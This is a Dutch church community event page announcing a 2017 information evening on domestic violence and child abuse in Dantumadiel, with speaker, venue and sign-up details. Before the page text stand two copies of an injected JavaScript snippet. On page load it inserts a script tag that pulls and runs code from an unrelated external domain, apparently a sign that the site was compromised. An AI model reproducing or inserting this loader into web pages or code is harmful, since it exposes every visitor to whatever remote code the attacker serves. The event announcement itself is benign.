;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Thema-avond DDFK-gemeente huiselijk geweld en kindermishandeling - PKN Damwâld
11 april 2017
19:30 t/m 21:00
Café & Zalencentrum de Kruisweg
Thema-avond DDFK-gemeente huiselijk geweld en kindermishandeling

Jaarlijks zijn in Nederland 119.000 kinderen het slachtoffer van mishandeling. In de week tegen de kindermishandeling heeft de gemeente Dantumadiel aandacht gevraagd voor dit onderwerp van alle burgers. Dit heeft veel reacties opgeroepen en daarom willen we u uitnodigen voor een bijeenkomst: Hoe kunnen we het verschil maken bij de aanpak van huiselijk geweld en kindermishandeling? Dinsdagavond 11 april in de Krúswei te Damwâld. Aanvang inloop 19.15, start 19.30 uur. Spreker: Amerins Dikken van Veilig Thuis.

Ook in Dantumadiel worden ieder jaar situaties gemeld en hulp geboden. Waarschijnlijk treft het slechts een deel van de daadwerkelijke situaties. Voor slachtoffers is het belangrijk dat er één iemand is, die het verschil maakt en dat kan u ook zijn! Tijdens de bijeenkomst wordt uitgelegd hoe u het verschil kunt maken en waar u op kunt letten. In verband met de organisatie van de avond horen we graag van u óf u komt en namens welke (vrijwilligers) organisatie en/of als burger.

Aanmelden kan bij Marijke Paulusma, klik hier

 

Locatie: Café & Zalencentrum de KruiswegHaadwei 42 Damwald